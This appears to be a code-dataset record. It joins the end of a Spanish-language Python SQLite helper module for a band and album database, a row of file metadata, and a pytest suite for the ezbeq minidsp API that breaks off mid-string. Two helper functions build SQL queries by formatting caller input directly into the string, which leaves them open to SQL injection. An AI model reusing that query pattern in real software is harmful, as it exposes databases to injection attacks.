conexion.close()
def Ver_Bandas_Totales():
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado')
query = "SELECT Banda FROM artistas;"
cursor.execute(query)
rows = cursor.fetchall()
print('Total de registros: ', len(rows))
cursor.close()
except sqlite3.Error as error:
print('Error con la conexion',error)
finally:
if(conexion):
conexion.close()
def Ver_Discos_x_Banda(banda):
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado')
query = "SELECT Banda FROM disco WHERE banda = '{}';".format(banda)
cursor.execute(query)
rows = cursor.fetchall()
print('Total de registros: ', len(rows))
for row in rows:
if 'Banda' != row['Banda']:
print('Banda: {}\nTitulo: {}\n'.format(*row))
cursor.close()
except sqlite3.Error as error:
print('Error con la conexion',error)
finally:
if(conexion):
conexion.close()
def Ver_Artistas_x_Tag(tag):
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado')
query = "SELECT * FROM artistas WHERE tag = '{}';".format(tag)
cursor.execute(query)
rows = cursor.fetchall()
print('Total de registros: ', len(rows))
print('------------Registros-------------')
for row in rows:
print('Id: {}\nBanda: {}\nTipo: {}\nTag: {}\nArea: {}'.format(*row))
cursor.close()
except sqlite3.Error as error:
print('Error con la conexion',error)
finally:
if(conexion):
conexion.close()
def Ver_Todos_Discos():
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado')
query = 'SELECT * FROM disco;'
cursor.execute(query)
rows = cursor.fetchall()
print('Total de registros: ', len(rows))
print('------------Registros-------------')
for row in rows:
print('Id: {}\nBanda: {}\nTitulo: {}\nPais: {}\nStatus: {}'.format(*row))
cursor.close()
except sqlite3.Error as error:
print('Error con la conexion',error)
finally:
if(conexion):
conexion.close()
| 27.362832
| 123
| 0.535899
| 943
| 9,276
| 5.231177
| 0.099682
| 0.031218
| 0.051085
| 0.070951
| 0.896412
| 0.896412
| 0.896412
| 0.888303
| 0.888303
| 0.888303
| 0
| 0.006962
| 0.318672
| 9,276
| 339
| 124
| 27.362832
| 0.773576
| 0
| 0
| 0.834615
| 0
| 0
| 0.279724
| 0.025655
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053846
| false
| 0
| 0.003846
| 0
| 0.061538
| 0.234615
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3be4738636d61ac8d23241aedddb2599f0418efb
| 38,783
|
py
|
Python
|
tests/test_minidsp_api.py
|
3ll3d00d/ezbeq
|
d1408297a95f7b811628175896ea917a465f36a2
|
[
"MIT"
] | 6
|
2021-01-16T18:34:30.000Z
|
2022-01-23T20:30:57.000Z
|
tests/test_minidsp_api.py
|
3ll3d00d/ezbeq
|
d1408297a95f7b811628175896ea917a465f36a2
|
[
"MIT"
] | 45
|
2021-01-16T09:35:35.000Z
|
2022-01-27T19:46:14.000Z
|
tests/test_minidsp_api.py
|
3ll3d00d/ezbeq
|
d1408297a95f7b811628175896ea917a465f36a2
|
[
"MIT"
] | 5
|
2021-01-16T21:42:32.000Z
|
2022-01-29T16:28:10.000Z
|
import json
import os
from typing import Tuple, List
import pytest
from conftest import MinidspSpyConfig, MinidspSpy
def verify_slot(slot: dict, idx: int, active: bool = False, gain: Tuple[float, float] = (0.0, 0.0),
mute: Tuple[bool, bool] = (False, False), last: str = 'Empty'):
assert slot['id'] == str(idx)
assert slot['active'] == active
assert slot['gain1'] == gain[0]
assert slot['gain2'] == gain[1]
assert slot['mute1'] == mute[0]
assert slot['mute2'] == mute[1]
assert slot['last'] == last
assert slot['canActivate'] is True
def verify_default_device_state(devices: dict):
slots = verify_master_device_state(devices)
for idx, s in enumerate(slots):
verify_slot(s, idx + 1, active=idx == 0)
def verify_master_device_state(devices, mute: bool = False, gain: float = 0.0):
assert devices
assert devices['mute'] == mute
assert float(devices['masterVolume']) == gain
slots = devices['slots']
assert slots
assert len(slots) == 4
return slots
def test_devices(minidsp_client, minidsp_app):
assert isinstance(minidsp_app.config['APP_CONFIG'], MinidspSpyConfig)
r = minidsp_client.get("/api/1/devices")
assert r
assert r.status_code == 200
verify_default_device_state(r.json)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("mute_op", ['on', 'off'])
def test_legacy_mute_both_inputs(minidsp_client, minidsp_app, slot, mute_op):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'channel': '0',
'value': mute_op,
'command': 'mute'
}
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps(payload), content_type='application/json')
verify_mute_both_inputs(config, mute_op, r, slot)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("mute_op", ['on', 'off'])
def test_mute_both_inputs(minidsp_client, minidsp_app, slot, mute_op):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
call = minidsp_client.put if mute_op == 'on' else minidsp_client.delete
r = call(f"/api/1/devices/master/mute/{slot}")
verify_mute_both_inputs(config, mute_op, r, slot)
def verify_mute_both_inputs(config, mute_op, r, slot):
assert r
assert r.status_code == 200
cmds = verify_cmd_count(config.spy, slot, 2)
assert cmds[0] == f"input 0 mute {mute_op}"
assert cmds[1] == f"input 1 mute {mute_op}"
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
if idx == slot - 1:
verify_slot(s, idx + 1, active=True, mute=(True, True) if mute_op == 'on' else (False, False))
else:
verify_slot(s, idx + 1)
def verify_cmd_count(spy: MinidspSpy, slot: int, expected_cmd_count: int, initial_slot=1) -> List[str]:
cmds = spy.take_commands()
if slot == initial_slot:
assert len(cmds) == expected_cmd_count
return cmds
else:
assert len(cmds) == expected_cmd_count + 1
assert cmds[0] == f"config {slot - 1}"
return cmds[1:] if expected_cmd_count > 0 else []
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("channel", [1, 2])
@pytest.mark.parametrize("mute_op", ['on', 'off'])
def test_legacy_mute_single_input(minidsp_client, minidsp_app, slot, channel, mute_op):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'channel': f"{channel}",
'value': mute_op,
'command': 'mute'
}
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps(payload), content_type='application/json')
verify_mute_single_input(channel, config, mute_op, r, slot)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("channel", [1, 2])
@pytest.mark.parametrize("mute_op", ['on', 'off'])
def test_mute_single_input(minidsp_client, minidsp_app, slot, channel, mute_op):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
call = minidsp_client.put if mute_op == 'on' else minidsp_client.delete
r = call(f"/api/1/devices/master/mute/{slot}/{channel}")
verify_mute_single_input(channel, config, mute_op, r, slot)
def verify_mute_single_input(channel, config, mute_op, r, slot):
assert r
assert r.status_code == 200
cmds = verify_cmd_count(config.spy, slot, 1)
assert cmds[0] == f"input {channel - 1} mute {mute_op}"
slots = verify_master_device_state(r.json)
if mute_op == 'on':
mute = (True, False) if channel == 1 else (False, True)
else:
mute = (False, False)
for idx, s in enumerate(slots):
if idx == slot - 1:
verify_slot(s, idx + 1, active=True, mute=mute)
else:
verify_slot(s, idx + 1)
@pytest.mark.parametrize("mute_op", ['on', 'off'])
def test_legacy_mute_master(minidsp_client, minidsp_app, mute_op):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'channel': 'master',
'value': mute_op,
'command': 'mute'
}
r = minidsp_client.put(f"/api/1/device/0", data=json.dumps(payload), content_type='application/json')
verify_mute_master(config, mute_op, r)
@pytest.mark.parametrize("mute_op", ['on', 'off'])
def test_mute_master(minidsp_client, minidsp_app, mute_op):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
call = minidsp_client.put if mute_op == 'on' else minidsp_client.delete
r = call(f"/api/1/devices/master/mute")
verify_mute_master(config, mute_op, r)
def verify_mute_master(config, mute_op, r):
assert r
assert r.status_code == 200
cmds = config.spy.take_commands()
assert len(cmds) == 1
assert cmds[0] == f"mute {mute_op}"
slots = verify_master_device_state(r.json, mute=True if mute_op == 'on' else False)
for idx, s in enumerate(slots):
verify_slot(s, idx + 1, active=idx == 0)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("gain,is_valid", [(-14.2, True), (-49.1, True), (-72.1, False), (0.5, True), (12.4, False)])
def test_legacy_set_input_gain(minidsp_client, minidsp_app, slot, gain, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'channel': '0',
'value': gain,
'command': 'gain'
}
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps(payload), content_type='application/json')
verify_set_input_gain(config, gain, is_valid, r, slot)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("gain,is_valid", [(-14.2, True), (-49.1, True), (-72.1, False), (0.5, True), (12.4, False)])
def test_set_input_gain(minidsp_client, minidsp_app, slot, gain, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {'gain': gain}
r = minidsp_client.put(f"/api/1/devices/master/gain/{slot}", data=json.dumps(payload),
content_type='application/json')
verify_set_input_gain(config, gain, is_valid, r, slot)
def verify_set_input_gain(config, gain, is_valid, r, slot):
assert r
if is_valid:
expected_gain = (gain, gain)
assert r.status_code == 200
cmds = verify_cmd_count(config.spy, slot, 2)
assert cmds[0] == f"input 0 gain -- {gain:.2f}"
assert cmds[1] == f"input 1 gain -- {gain:.2f}"
else:
expected_gain = (0.0, 0.0)
assert r.status_code == 400
cmds = config.spy.take_commands()
assert len(cmds) == 0
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
slot_is_active = idx == slot - 1 if is_valid else idx == 0
if idx == slot - 1:
verify_slot(s, idx + 1, active=slot_is_active, gain=expected_gain)
else:
verify_slot(s, idx + 1, active=slot_is_active)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("channel", [1, 2])
@pytest.mark.parametrize("gain,is_valid", [(-14.2, True), (-49.1, True), (-72.1, False), (0.5, True), (12.4, False)])
def test_legacy_set_input_gain_single_input(minidsp_client, minidsp_app, slot, channel, gain, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'channel': channel,
'value': gain,
'command': 'gain'
}
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps(payload), content_type='application/json')
verify_set_input_gain_single_input(channel, config, gain, is_valid, r, slot)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("channel", [1, 2])
@pytest.mark.parametrize("gain,is_valid", [(-14.2, True), (-49.1, True), (-72.1, False), (0.5, True), (12.4, False)])
def test_set_input_gain_single_input(minidsp_client, minidsp_app, slot, channel, gain, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {'gain': gain}
r = minidsp_client.put(f"/api/1/devices/master/gain/{slot}/{channel}", data=json.dumps(payload),
content_type='application/json')
verify_set_input_gain_single_input(channel, config, gain, is_valid, r, slot)
def verify_set_input_gain_single_input(channel, config, gain, is_valid, r, slot):
assert r
if is_valid:
expected_gain = (gain, 0.0) if channel == 1 else (0.0, gain)
assert r.status_code == 200
cmds = verify_cmd_count(config.spy, slot, 1)
assert cmds[0] == f"input {channel - 1} gain -- {gain:.2f}"
else:
expected_gain = (0.0, 0.0)
assert r.status_code == 400
cmds = config.spy.take_commands()
assert len(cmds) == 0
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
slot_is_active = idx == slot - 1 if is_valid else idx == 0
if idx == slot - 1:
verify_slot(s, idx + 1, active=slot_is_active, gain=expected_gain)
else:
verify_slot(s, idx + 1, active=slot_is_active)
@pytest.mark.parametrize("gain,is_valid", [(-14.2, True), (-49.1, True), (-72.1, True), (0.5, False), (-128.0, False)])
def test_legacy_set_master_gain(minidsp_client, minidsp_app, gain, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'channel': 'master',
'value': gain,
'command': 'gain'
}
r = minidsp_client.put(f"/api/1/device/0", data=json.dumps(payload), content_type='application/json')
verify_set_master_gain(config, gain, is_valid, r)
@pytest.mark.parametrize("gain,is_valid", [(-14.2, True), (-49.1, True), (-72.1, True), (0.5, False), (-128.0, False)])
def test_set_master_gain(minidsp_client, minidsp_app, gain, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {'gain': gain}
r = minidsp_client.put(f"/api/1/devices/master/gain", data=json.dumps(payload), content_type='application/json')
verify_set_master_gain(config, gain, is_valid, r)
def verify_set_master_gain(config, gain, is_valid, r):
assert r
if is_valid:
assert r.status_code == 200
cmds = config.spy.take_commands()
assert len(cmds) == 1
assert cmds[0] == f"gain -- {gain:.2f}"
else:
assert r.status_code == 400
cmds = config.spy.take_commands()
assert len(cmds) == 0
slots = verify_master_device_state(r.json, gain=gain if is_valid else 0.0)
for idx, s in enumerate(slots):
verify_slot(s, idx + 1, active=idx == 0)
@pytest.mark.parametrize("slot,is_valid", [(0, False), (1, True), (2, True), (3, True), (4, True), (5, False)])
def test_legacy_activate_slot(minidsp_client, minidsp_app, slot, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'command': 'activate'
}
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps(payload), content_type='application/json')
verify_activate_slot(config, is_valid, r, slot)
@pytest.mark.parametrize("slot,is_valid", [(0, False), (1, True), (2, True), (3, True), (4, True), (5, False)])
def test_activate_slot(minidsp_client, minidsp_app, slot, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
r = minidsp_client.put(f"/api/1/devices/master/config/{slot}/active")
verify_activate_slot(config, is_valid, r, slot)
def verify_activate_slot(config, is_valid, r, slot):
assert r
if is_valid:
assert r.status_code == 200
cmds = verify_cmd_count(config.spy, slot, 0)
else:
assert r.status_code == 400
cmds = config.spy.take_commands()
assert len(cmds) == 0
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
if is_valid:
verify_slot(s, idx + 1, active=idx + 1 == slot)
else:
verify_slot(s, idx + 1, active=idx == 0)
def test_legacy_state_maintained_over_multiple_updates(minidsp_client, minidsp_app):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
# when: activate slot 2
r = minidsp_client.put(f"/api/1/device/2", data=json.dumps({'command': 'activate'}),
content_type='application/json')
assert r.status_code == 200
# and: set master gain
gain_payload = {
'channel': 'master',
'value': -10.2,
'command': 'gain'
}
r = minidsp_client.put(f"/api/1/device/0", data=json.dumps(gain_payload), content_type='application/json')
assert r.status_code == 200
# and: set input gain on slot 3
gain_payload = {
'channel': '0',
'value': 5.1,
'command': 'gain'
}
r = minidsp_client.put(f"/api/1/device/3", data=json.dumps(gain_payload), content_type='application/json')
assert r.status_code == 200
# and: set input gain on one channel on slot 3
gain_payload = {
'channel': '2',
'value': 6.1,
'command': 'gain'
}
r = minidsp_client.put(f"/api/1/device/3", data=json.dumps(gain_payload), content_type='application/json')
assert r.status_code == 200
# then: expected commands are sent
cmds = config.spy.take_commands()
assert len(cmds) == 6
assert cmds[0] == "config 1"
assert cmds[1] == "gain -- -10.20"
assert cmds[2] == "config 2"
assert cmds[3] == "input 0 gain -- 5.10"
assert cmds[4] == "input 1 gain -- 5.10"
assert cmds[5] == "input 1 gain -- 6.10"
# and: device state is accurate
slots = verify_master_device_state(r.json, gain=-10.2)
verify_slot(slots[0], 1)
verify_slot(slots[1], 2)
verify_slot(slots[2], 3, active=True, gain=(5.10, 6.10))
verify_slot(slots[3], 4)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
def test_legacy_multiple_updates_in_one_payload(minidsp_client, minidsp_app, slot):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
# when: activate slot
# and: set master gain
# and: set input gain
payload = [
{
'command': 'activate'
},
{
'channel': 'master',
'value': -10.2,
'command': 'gain'
},
{
'channel': '0',
'value': 5.1,
'command': 'gain'
},
{
'channel': '2',
'value': 6.1,
'command': 'gain'
}
]
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps(payload), content_type='application/json')
assert r.status_code == 200
# then: expected commands are sent
cmds = verify_cmd_count(config.spy, slot, 4)
assert cmds[0] == "gain -- -10.20"
assert cmds[1] == "input 0 gain -- 5.10"
assert cmds[2] == "input 1 gain -- 5.10"
assert cmds[3] == "input 1 gain -- 6.10"
# and: device state is accurate
slots = verify_master_device_state(r.json, gain=-10.2)
for idx, s in enumerate(slots):
if idx + 1 == slot:
verify_slot(s, idx + 1, active=True, gain=(5.10, 6.10))
else:
verify_slot(s, idx + 1)
def test_legacy_load_unknown_entry(minidsp_client, minidsp_app):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
r = minidsp_client.put(f"/api/1/device/1", data=json.dumps({'command': 'load', 'id': 'super'}),
content_type='application/json')
assert r.status_code == 404
cmds = config.spy.take_commands()
assert len(cmds) == 0
def test_load_unknown_entry(minidsp_client, minidsp_app):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
r = minidsp_client.put(f"/api/1/devices/master/filter/1/super")
assert r.status_code == 404
cmds = config.spy.take_commands()
assert len(cmds) == 0
def test_search_all(minidsp_client, minidsp_app):
r = minidsp_client.get(f"/api/1/search")
assert r.status_code == 200
catalogue = r.json
assert catalogue
assert len(catalogue) == 1
entry = catalogue[0]
assert entry['id'] == '123456_0'
assert entry['title'] == 'Alien Resurrection'
def test_search_no_match(minidsp_client, minidsp_app):
r = minidsp_client.get(f"/api/1/search", query_string={'authors': 'me'})
assert r.status_code == 200
catalogue = r.json
assert len(catalogue) == 0
def test_authors(minidsp_client):
r = minidsp_client.get(f"/api/1/authors")
assert r.status_code == 200
data = r.json
assert data
assert len(data) == 1
assert data[0] == 'aron7awol'
def test_contenttypes(minidsp_client):
r = minidsp_client.get(f"/api/1/contenttypes")
assert r.status_code == 200
data = r.json
assert data
assert len(data) == 1
assert data[0] == 'film'
def test_years(minidsp_client):
r = minidsp_client.get(f"/api/1/years")
assert r.status_code == 200
data = r.json
assert data
assert len(data) == 1
assert data[0] == 1997
def test_audiotypes(minidsp_client):
r = minidsp_client.get(f"/api/1/audiotypes")
assert r.status_code == 200
data = r.json
assert data
assert len(data) == 1
assert data[0] == 'DTS-HD MA 5.1'
def test_metadata(minidsp_client):
r = minidsp_client.get(f"/api/1/meta")
assert r.status_code == 200
data = r.json
assert data
assert data['version'] == '123456'
assert data['loaded']
assert data['count'] == 1
def test_version(minidsp_client):
r = minidsp_client.get(f"/api/1/version")
assert r.status_code == 200
data = r.json
assert data
assert data['version'] == '1.2.3'
@pytest.mark.parametrize("slot,is_valid", [(0, False), (1, True), (2, True), (3, True), (4, True), (5, False)])
def test_legacy_load_known_entry_and_then_clear(minidsp_client, minidsp_app, slot, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps({'command': 'load', 'id': '123456_0'}),
content_type='application/json')
if is_valid:
assert r.status_code == 200
cmds = verify_cmd_count(config.spy, slot, 30)
expected_commands = f"""input 0 peq 0 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 0 bypass off
input 0 peq 1 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 1 bypass off
input 0 peq 2 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 2 bypass off
input 0 peq 3 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 3 bypass off
input 0 peq 4 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 4 bypass off
input 0 peq 5 bypass on
input 0 peq 6 bypass on
input 0 peq 7 bypass on
input 0 peq 8 bypass on
input 0 peq 9 bypass on
input 1 peq 0 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 0 bypass off
input 1 peq 1 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 1 bypass off
input 1 peq 2 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 2 bypass off
input 1 peq 3 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 3 bypass off
input 1 peq 4 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 4 bypass off
input 1 peq 5 bypass on
input 1 peq 6 bypass on
input 1 peq 7 bypass on
input 1 peq 8 bypass on
input 1 peq 9 bypass on"""
assert '\n'.join(cmds) == expected_commands
else:
assert r.status_code == 400
cmds = config.spy.take_commands()
assert not cmds
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
slot_is_active = idx + 1 == slot if is_valid else idx == 0
if is_valid and idx + 1 == slot:
verify_slot(s, idx + 1, active=slot_is_active, last='Alien Resurrection')
else:
verify_slot(s, idx + 1, active=slot_is_active)
if is_valid:
r = minidsp_client.delete(f"/api/1/device/{slot}")
assert r.status_code == 200
cmds = config.spy.take_commands()
assert len(cmds) == 24
expected_commands = f"""input 0 peq 0 bypass on
input 0 peq 1 bypass on
input 0 peq 2 bypass on
input 0 peq 3 bypass on
input 0 peq 4 bypass on
input 0 peq 5 bypass on
input 0 peq 6 bypass on
input 0 peq 7 bypass on
input 0 peq 8 bypass on
input 0 peq 9 bypass on
input 1 peq 0 bypass on
input 1 peq 1 bypass on
input 1 peq 2 bypass on
input 1 peq 3 bypass on
input 1 peq 4 bypass on
input 1 peq 5 bypass on
input 1 peq 6 bypass on
input 1 peq 7 bypass on
input 1 peq 8 bypass on
input 1 peq 9 bypass on
input 0 mute off
input 1 mute off
input 0 gain -- 0.00
input 1 gain -- 0.00"""
assert '\n'.join(cmds) == expected_commands
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
slot_is_active = idx + 1 == slot if is_valid else idx == 0
verify_slot(s, idx + 1, active=slot_is_active)
@pytest.mark.parametrize("slot,is_valid", [(0, False), (1, True), (2, True), (3, True), (4, True), (5, False)])
def test_load_known_entry_and_then_clear(minidsp_client, minidsp_app, slot, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
r = minidsp_client.put(f"/api/1/devices/master/filter/{slot}", data=json.dumps({'entryId': '123456_0'}),
content_type='application/json')
if is_valid:
assert r.status_code == 200
cmds = verify_cmd_count(config.spy, slot, 30)
expected_commands = f"""input 0 peq 0 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 0 bypass off
input 0 peq 1 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 1 bypass off
input 0 peq 2 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 2 bypass off
input 0 peq 3 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 3 bypass off
input 0 peq 4 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 4 bypass off
input 0 peq 5 bypass on
input 0 peq 6 bypass on
input 0 peq 7 bypass on
input 0 peq 8 bypass on
input 0 peq 9 bypass on
input 1 peq 0 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 0 bypass off
input 1 peq 1 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 1 bypass off
input 1 peq 2 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 2 bypass off
input 1 peq 3 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 3 bypass off
input 1 peq 4 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 4 bypass off
input 1 peq 5 bypass on
input 1 peq 6 bypass on
input 1 peq 7 bypass on
input 1 peq 8 bypass on
input 1 peq 9 bypass on"""
assert '\n'.join(cmds) == expected_commands
else:
assert r.status_code == 400
cmds = config.spy.take_commands()
assert not cmds
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
slot_is_active = idx + 1 == slot if is_valid else idx == 0
if is_valid and idx + 1 == slot:
verify_slot(s, idx + 1, active=slot_is_active, last='Alien Resurrection')
else:
verify_slot(s, idx + 1, active=slot_is_active)
if is_valid:
r = minidsp_client.delete(f"/api/1/devices/master/filter/{slot}")
assert r.status_code == 200
cmds = config.spy.take_commands()
assert len(cmds) == 24
expected_commands = f"""input 0 peq 0 bypass on
input 0 peq 1 bypass on
input 0 peq 2 bypass on
input 0 peq 3 bypass on
input 0 peq 4 bypass on
input 0 peq 5 bypass on
input 0 peq 6 bypass on
input 0 peq 7 bypass on
input 0 peq 8 bypass on
input 0 peq 9 bypass on
input 1 peq 0 bypass on
input 1 peq 1 bypass on
input 1 peq 2 bypass on
input 1 peq 3 bypass on
input 1 peq 4 bypass on
input 1 peq 5 bypass on
input 1 peq 6 bypass on
input 1 peq 7 bypass on
input 1 peq 8 bypass on
input 1 peq 9 bypass on
input 0 mute off
input 1 mute off
input 0 gain -- 0.00
input 1 gain -- 0.00"""
assert '\n'.join(cmds) == expected_commands
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
slot_is_active = idx + 1 == slot if is_valid else idx == 0
verify_slot(s, idx + 1, active=slot_is_active)
def test_patch_multiple_fields(minidsp_client, minidsp_app):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
# when: set master gain
# and: set input gains
payload = {
'masterVolume': -10.2,
'mute': True,
'slots': [
{
'id': '2',
'gain1': 5.1,
'gain2': 6.1
}
]
}
r = minidsp_client.patch(f"/api/1/devices/master", data=json.dumps(payload), content_type='application/json')
assert r.status_code == 200
# then: expected commands are sent
cmds = verify_cmd_count(config.spy, 2, 4)
assert cmds[0] == "input 0 gain -- 5.10"
assert cmds[1] == "input 1 gain -- 6.10"
assert cmds[2] == "mute on"
assert cmds[3] == "gain -- -10.20"
# and: device state is accurate
slots = verify_master_device_state(r.json, mute=True, gain=-10.2)
for idx, s in enumerate(slots):
if idx + 1 == 2:
verify_slot(s, idx + 1, active=True, gain=(5.10, 6.10))
else:
verify_slot(s, idx + 1)
def test_patch_multiple_slots(minidsp_client, minidsp_app):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
# when: set master gain
# and: set input gains
payload = {
'masterVolume': -10.2,
'slots': [
{
'id': '2',
'gain1': 5.1,
'gain2': 6.1
},
{
'id': '3',
'gain1': -1.1,
'gain2': -1.1,
'entry': '123456_0',
'mute1': False,
'mute2': False
}
]
}
r = minidsp_client.patch(f"/api/1/devices/master", data=json.dumps(payload), content_type='application/json')
assert r.status_code == 200
# then: expected commands are sent
cmds = verify_cmd_count(config.spy, 2, 38)
expected_commands = f"""input 0 gain -- 5.10
input 1 gain -- 6.10
config 2
input 0 gain -- -1.10
input 1 gain -- -1.10
input 0 mute off
input 1 mute off
input 0 peq 0 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 0 bypass off
input 0 peq 1 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 1 bypass off
input 0 peq 2 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 2 bypass off
input 0 peq 3 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 3 bypass off
input 0 peq 4 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 0 peq 4 bypass off
input 0 peq 5 bypass on
input 0 peq 6 bypass on
input 0 peq 7 bypass on
input 0 peq 8 bypass on
input 0 peq 9 bypass on
input 1 peq 0 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 0 bypass off
